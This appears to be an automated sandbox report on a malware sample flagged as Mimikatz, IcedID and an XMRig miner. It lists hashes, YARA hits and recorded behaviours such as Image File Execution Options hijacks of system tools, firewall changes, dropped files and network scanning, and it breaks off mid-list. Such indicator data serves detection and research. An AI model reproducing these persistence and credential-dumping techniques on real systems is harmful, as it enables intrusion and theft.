Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 09:54
Behavioral task
behavioral1
Sample
2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe
-
Size
8.4MB
-
MD5
6e9c8b26278c52211e1fc7188ad98bf9
-
SHA1
a3462fb797c6f067ecd9992b8d5734c90eee80dd
-
SHA256
567719f80c92834cc5a04cff32b293ca5427f20e499b74106823e27ed7217499
-
SHA512
d19704ac8596a3018e13ed5fa7f7d6e696d54e0e7e2b84972654673b25253ecc2d4dfdba79fd887cc25db127e05da9880df09e87428a01518ab8ea0ce39f15f2
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4300 created 1700 4300 ceitlwt.exe 37 -
Contacts a large (20670) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3996-183-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-187-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-204-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-217-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-223-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-235-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-250-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-259-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-280-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig behavioral2/memory/3996-390-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3672-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3672-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x0007000000023455-6.dat mimikatz behavioral2/memory/1476-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1380-139-0x00007FF7E06C0000-0x00007FF7E07AE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts ceitlwt.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ceitlwt.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ceitlwt.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1336 netsh.exe 264 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 1476 ceitlwt.exe 4300 ceitlwt.exe 3736 wpcap.exe 4876 vgcgjtnzb.exe 1380 vfshost.exe 3652 gyzjuuiut.exe 2828 xohudmc.exe 3248 qigmew.exe 3996 iggias.exe 5096 gyzjuuiut.exe 3260 gyzjuuiut.exe 2384 ceitlwt.exe 3064 gyzjuuiut.exe 4876 gyzjuuiut.exe 3020 gyzjuuiut.exe 3300 gyzjuuiut.exe 2952 gyzjuuiut.exe 4832 gyzjuuiut.exe 2004 gyzjuuiut.exe 3640 gyzjuuiut.exe 1504 gyzjuuiut.exe 3796 gyzjuuiut.exe 5096 gyzjuuiut.exe 752 gyzjuuiut.exe 1136 gyzjuuiut.exe 1512 gyzjuuiut.exe 640 gyzjuuiut.exe 4044 ujtcpitiu.exe 2364 ceitlwt.exe -
Loads dropped DLL 12 IoCs
pid Process 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 3736 wpcap.exe 4876 vgcgjtnzb.exe 4876 vgcgjtnzb.exe 4876 vgcgjtnzb.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 81 ifconfig.me 82 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ceitlwt.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\qigmew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE ceitlwt.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ceitlwt.exe File opened for modification C:\Windows\SysWOW64\qigmew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE ceitlwt.exe -
resource yara_rule behavioral2/memory/1380-136-0x00007FF7E06C0000-0x00007FF7E07AE000-memory.dmp upx behavioral2/files/0x00070000000234ab-137.dat upx behavioral2/memory/1380-139-0x00007FF7E06C0000-0x00007FF7E07AE000-memory.dmp upx behavioral2/files/0x00070000000234b6-142.dat upx behavioral2/memory/3652-143-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3652-157-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/files/0x00070000000234b3-165.dat upx behavioral2/memory/3996-166-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/5096-172-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3260-176-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-183-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/3064-185-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-187-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/4876-190-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3020-194-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3300-198-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/2952-202-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-204-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/4832-207-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/2004-211-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3640-215-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-217-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/1504-220-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-223-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/3796-225-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/5096-229-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/752-232-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/1136-234-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-235-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/1512-237-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/640-239-0x00007FF625B80000-0x00007FF625BDB000-memory.dmp upx behavioral2/memory/3996-250-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/3996-259-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/3996-280-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx behavioral2/memory/3996-390-0x00007FF7AF140000-0x00007FF7AF260000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bjvibcuuu\UnattendGC\specials\crli-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\tucl-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\zlib1.dll ceitlwt.exe File opened for modification C:\Windows\bjvibcuuu\vrituptli\Result.txt ujtcpitiu.exe File opened for modification C:\Windows\iyvumtbf\ceitlwt.exe 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\posh-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\docmicfg.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\AppCapture32.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\wpcap.dll ceitlwt.exe File created C:\Windows\ime\ceitlwt.exe ceitlwt.exe File opened for modification C:\Windows\bjvibcuuu\Corporate\log.txt cmd.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\docmicfg.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\spoolsrv.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\Corporate\mimilib.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\schoedcl.xml ceitlwt.exe File created C:\Windows\iyvumtbf\spoolsrv.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\Shellcode.ini ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\libeay32.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\Corporate\vfshost.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\scan.bat ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\Packet.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\trch-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\xdvl-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\AppCapture64.dll ceitlwt.exe File created C:\Windows\iyvumtbf\ceitlwt.exe 2024-09-28_6e9c8b26278c52211e1fc7188ad98bf9_hacktools_icedid_mimikatz.exe File created C:\Windows\bjvibcuuu\UnattendGC\vimpcsvc.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\exma-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\ssleay32.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\vimpcsvc.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\upbdrjv\swrpwe.exe ceitlwt.exe File opened for modification C:\Windows\bjvibcuuu\vrituptli\Packet.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\libxml2.dll ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\spoolsrv.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\Corporate\mimidrv.sys ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\tibe-2.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\ucl.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\svschost.exe ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\schoedcl.xml ceitlwt.exe File created C:\Windows\iyvumtbf\docmicfg.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\svschost.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\vimpcsvc.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\ujtcpitiu.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\cnli-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\vimpcsvc.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\docmicfg.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\schoedcl.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\coli-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\trfo-2.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\svschost.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\ip.txt ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\docmicfg.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\wpcap.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\schoedcl.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\svschost.xml ceitlwt.exe File created C:\Windows\iyvumtbf\svschost.xml ceitlwt.exe File created C:\Windows\iyvumtbf\schoedcl.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\spoolsrv.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\spoolsrv.xml ceitlwt.exe File created C:\Windows\iyvumtbf\vimpcsvc.xml ceitlwt.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4824 sc.exe 1204 sc.exe 1852 sc.exe 2952 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ceitlwt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened 